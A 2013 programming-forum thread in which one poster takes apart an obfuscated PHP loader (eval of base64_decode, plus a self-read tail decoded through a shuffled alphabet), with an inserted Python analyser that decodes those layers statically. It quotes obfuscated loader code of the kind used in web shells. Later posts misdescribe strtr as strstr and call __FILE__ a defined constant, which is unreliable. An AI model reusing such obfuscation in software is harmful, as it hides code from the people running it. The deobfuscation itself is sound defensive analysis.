Buying: Need someone to decode two small PHP files

Discussion in 'Programming' started by eclud, Jan 11, 2013.

  1. #1
    Hi guys, as the title says, I need someone to decode two small encrypted PHP files. Easy job, leave prices please :)
     
    eclud, Jan 11, 2013 IP
  2. edduvs

    edduvs Well-Known Member

    Messages:
    394
    Likes Received:
    31
    Best Answers:
    3
    Trophy Points:
    160
    As Seller:
    100% - 2
    As Buyer:
    100% - 0
    #2
    How are they encoded? Zend, eAccelerator, IonCube?
     
    edduvs, Jan 11, 2013 IP
  3. eclud

    eclud Member

    Messages:
    40
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    36
    As Seller:
    100% - 2
    As Buyer:
    100% - 0
    #3
    To be honest I don't know; this is a part of one of them:

    $OOO0O0O00=__FILE__;$OO00O0000=0xaf9c;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU4NCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4M2E0KSwnbWJSZi9ENWN1QW5HaVBXK0Uxd294YUtzZUxsdjRYWk9VMmpZcTdOQ3JIVDZCcHRRa2hJU3l6OVYzZ0ZkSjBNOD0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsv
     
    eclud, Jan 11, 2013 IP
  4. edduvs

    #4
    Can you give us the full file in a [code-] [-/code] block?
     
    edduvs, Jan 11, 2013 IP
  5. eclud

    #5
    I will PM you the code.
     
    eclud, Jan 11, 2013 IP
  6. edduvs

    #6
    OK so, I will NOT send you the decoded file since reverse engineering is strictly prohibited, but I will give you some tips (I can't even understand the whole file if I don't have the rest):

    
    $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');
    Actually means: $OOO000000='fg6sbehpra4co_tnd';
    
    $GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
    $GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};
    $GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
    $GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
    $GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};
    $GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
    $GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
    $OOO0O0O00=__FILE__;
    $OO00O0000=0xaf9c;
    
    If you take a look at the code, it has just been minified, so take it step by step:
    1. $GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
    - Means $GLOBALS['OOO0000O0'] = 'base64_d'; (remember $var{4} extracts character number 4)
    
    2. $GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};
    - Means 'base64_d' .= 'ecode', which results in $GLOBALS['OOO0000O0'] = 'base64_decode';
    
    3. $GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
    - Means $GLOBALS['OOO000O00'] = 'fopen';
    
    4. $GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
    - Means $GLOBALS['O0O000O00'] = 'fget';
    
    5. $GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};
    - Means $GLOBALS['O0O000O00'] = 'fgets';
    
    6. $GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
    - Means $GLOBALS['O0O00OO00'] = 'fread';
    
    7. $GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
    - Means $GLOBALS['OOO00000O']= 'strtr';
    
    8. $OOO0O0O00=__FILE__;
    - __FILE__ is a constant probably defined somewhere in another file; I don't have the whole script, so I can't tell which file it is.
    
    9. $OO00O0000=0xaf9c;
    - 0xaf9c (hexadecimal) equals 44956 in decimal
    
    Okay so you got all the variables figured out, now you must focus on the next code:
    
    eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU4NCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4M2E0KSwnbWJSZi9ENWN1QW5HaVBXK0Uxd294YUtzZUxsdjRYWk9VMmpZcTdOQ3JIVDZCcHRRa2hJU3l6OVYzZ0ZkSjBNOD0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));
    return;
    
    Which is quite easy, considering that you already know what $GLOBALS['OOO0000O0'] means ('base64_decode'); just replace it and you will have:
    eval(base64_decode('JE8w....')); return;
    
    Now, you obviously go and decode that base64 string and you get:
    $O000O0O00=$GLOBALS['OOO000O00']($OOO0O0O00,'rb');
    $GLOBALS['O0O00OO00']($O000O0O00,0x584);
    $OO00O00O0=$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,0x3a4),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));
    eval($OO00O00O0);
    
    Again, you already know all the variables. Meanwhile the script is creating $OO00O00O0 as a string; it calls eval($OO00O00O0) at the end, so PHP will interpret the text as PHP code. Now we try and replace the variables that we already know and we get:
    
    $O000O0O00 = fopen(__FILE__,'rb');
    fread($O000O0O00,0x584);
    $OO00O00O0 = base64_decode(strtr(fread($O000O0O00,0x3a4),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));
    
    * We don't need eval anymore because we have already written the code in PHP.
    
    Not knowing $O000O0O00's name, and since it's just the handle of __FILE__, we'll just use $handle. Seeing that we have some hexadecimal numbers, we'll try and figure out what they are useful for.
    
    So we have: 
    $handle = fopen(__FILE__,'rb');
    fread($handle,1412); // 0x584 in decimal equals 1412
    $OO00O00O0=base64_decode(strtr(fread($handle,932),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')); //because 0x3a4 is 932 in decimal
    
    The next and only step available is to replace fread. Knowing that we already read 1412 bytes from the file, the pointer is at byte 1413. Since we are speaking about a file, we know that files contain characters, and we also know that characters can be single or multi-byte. So, the pointer is at 1413; next step, the variable called $OO00O00O0 gets the value of a string, knowing that strstr returns the first occurrence of the needle in the haystack.
    
    So the first parameter of strstr is the content of file __FILE__ from byte 1413 for the following 932 bytes. The second and third parameters are strings. The interesting thing is the third parameter of the strstr in file __FILE__. Since base64_decode will NEVER get an ordered string, this is just set as a TRUE parameter for the strstr function (check the PHP 5 documentation).
    
    So we come up with this: 
    $handle = fopen(__FILE__,'rb');
    fread($handle,1412);
    $OO00O00O0=base64_decode(strtr(fread($handle,932),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=',true));
    
    $OO00O00O0 will be a base64-encoded string which is contained starting from byte 1412 up to the first occurrence of 'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=', without including the needle (since we have true as the third before_needle param).
    
    This is the end of our journey, since we cannot go any further without having the possibility to study your __FILE__ constant (which is, by the way, opened for reading in binary mode, which lets us know it's another base64_encode string).
    
     
    edduvs, Jan 12, 2013 IP
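The walkthrough above is the kind of layered loader an incident responder meets when a web shell or backdoored plugin is found on a host: a name-building header, an eval(base64_decode(...)) stage, and a tail of the file read back through a shuffled base64 alphabet. Below is an added example, not code from the thread or from either poster, that performs edduvs's steps statically in Python so nothing obfuscated is ever executed. The header and the eval blob are copied verbatim from post #6; the tail of the real file is not on the page, so the last stage is shown on a constructed sample produced by an inverse encoder. The analyser treats the third stage as PHP's three-argument strtr(), which is a character-for-character translation of the shuffled alphabet 'mbRf/...' back onto the standard base64 alphabet (strtr ignores the surplus trailing '=' of the longer string); the 0x584 and 0x3a4 arguments are the byte counts the loader skips and then reads from its own file.

```python
import base64
import re
from urllib.parse import unquote

# Header quoted in post #6. The __FILE__ and 0xaf9c lines are plain literals and are
# not needed to recover the function names, so they are omitted here.
HEADER = """
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');
$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};
$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};
$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
"""

# The argument of eval($GLOBALS['OOO0000O0'](...)) from post #6, copied verbatim.
BLOB = ('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10o'
        'JE8wMDBPME8wMCwweDU4NCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTydd'
        'KCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4M2E0KSwnbWJSZi9ENWN1QW5HaVBXK0Uxd294YUtzZUxsdjRY'
        'Wk9VMmpZcTdOQ3JIVDZCcHRRa2hJU3l6OVYzZ0ZkSjBNOD0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdo'
        'aWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7')

# At PHP file scope $name and $GLOBALS['name'] are the same variable, so both spellings
# resolve to one symbol table entry.
ASSIGN_RE = re.compile(r"^\$(?:GLOBALS\['(\w+)'\]|(\w+))(\.?=)(.+);$")
TERM_RE = re.compile(r"^\$(?:GLOBALS\['(\w+)'\]|(\w+))(?:\{(\d+)\})?$")
URLDECODE_RE = re.compile(r"^urldecode\('([^']*)'\)$")
GLOBALS_REF_RE = re.compile(r"\$GLOBALS\['(\w+)'\]")
FREAD_RE = re.compile(r"fread\(\$\w+,(0x[0-9a-fA-F]+|\d+)\)")


def _eval_term(term, env):
    """One '.'-separated operand: urldecode('...'), $var, $GLOBALS['var'] or either with {n}."""
    term = term.strip()
    u = URLDECODE_RE.match(term)
    if u:
        return unquote(u.group(1))
    t = TERM_RE.match(term)
    if not t:
        raise ValueError('unsupported term: %r' % term)
    value = env[t.group(1) or t.group(2)]
    return value[int(t.group(3))] if t.group(3) is not None else value


def resolve_names(header):
    """Statically evaluate the string-building header; returns {symbol: string}."""
    env = {}
    for line in header.strip().splitlines():
        m = ASSIGN_RE.match(line.strip())
        if not m:
            raise ValueError('unsupported statement: %r' % line)
        target, op, rhs = m.group(1) or m.group(2), m.group(3), m.group(4)
        value = ''.join(_eval_term(t, env) for t in rhs.split('.'))
        env[target] = env.get(target, '') + value if op == '.=' else value
    return env


def decode_eval_layer(blob, env):
    """base64-decode the eval() argument and rename $GLOBALS[...] calls to the resolved names."""
    code = base64.b64decode(blob).decode('ascii')
    return GLOBALS_REF_RE.sub(lambda m: env.get(m.group(1), m.group(0)), code)


def fread_lengths(code):
    """Byte counts the loader skips and then reads from its own file, as decimal ints."""
    return [int(n, 0) for n in FREAD_RE.findall(code)]


SCRAMBLED = 'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8='
STANDARD = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# strtr($s, $from, $to) maps from[i] -> to[i] and ignores the surplus chars of the longer
# string, so the trailing '=' of SCRAMBLED is never translated; mirror that by truncating.
_UNSCRAMBLE = str.maketrans(SCRAMBLED[:len(STANDARD)], STANDARD)
_SCRAMBLE = str.maketrans(STANDARD, SCRAMBLED[:len(STANDARD)])


def unscramble_tail(tail):
    """What base64_decode(strtr(fread(...), SCRAMBLED, STANDARD)) yields for a file tail."""
    return base64.b64decode(tail.decode('ascii').translate(_UNSCRAMBLE))


def scramble_for_demo(plaintext):
    """Constructed inverse of the loader, used only to build a sample tail for the demo."""
    return base64.b64encode(plaintext).decode('ascii').translate(_SCRAMBLE).encode('ascii')


# Constructed sample: the page does not contain the real file tail.
SAMPLE_TAIL = scramble_for_demo(b"<?php echo 'constructed sample payload'; ?>")

if __name__ == '__main__':
    names = resolve_names(HEADER)
    for sym, fn in names.items():
        print('%-10s -> %s' % (sym, fn))
    stage2 = decode_eval_layer(BLOB, names)
    print(stage2)                       # the loader with real function names, never eval'd
    print('skip/read byte counts:', fread_lengths(stage2))
    print(unscramble_tail(SAMPLE_TAIL).decode())
```

Running it prints the six resolved symbols (base64_decode, fopen, fgets, fread, strtr and the seed string), the second-stage loader with its calls renamed, the byte counts 1412 and 932, and the recovered sample tail. On a real sample the analyst would slice the suspect file at those offsets and feed the 932 bytes to unscramble_tail(), then read the result instead of letting PHP eval it.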
  7. eclud

    #7
    Thanks a lot, I will try :) but it looks hard :D
     
    eclud, Jan 12, 2013 IP
  8. edduvs

    #8
    It looks that way because it's a lot of scrambled PHP code. It's meant to look this way, but this is very simple and logical, going backwards. If it were scrambled without logic, PHP itself wouldn't know how to manage the code, but it manages the code as I've explained earlier :). You need to find that __FILE__ and echo the base64_decode from the strstr(fread(a,b),c,d);

    If you could send me a PM with all the files, I could take a deeper look.
     
    edduvs, Jan 12, 2013 IP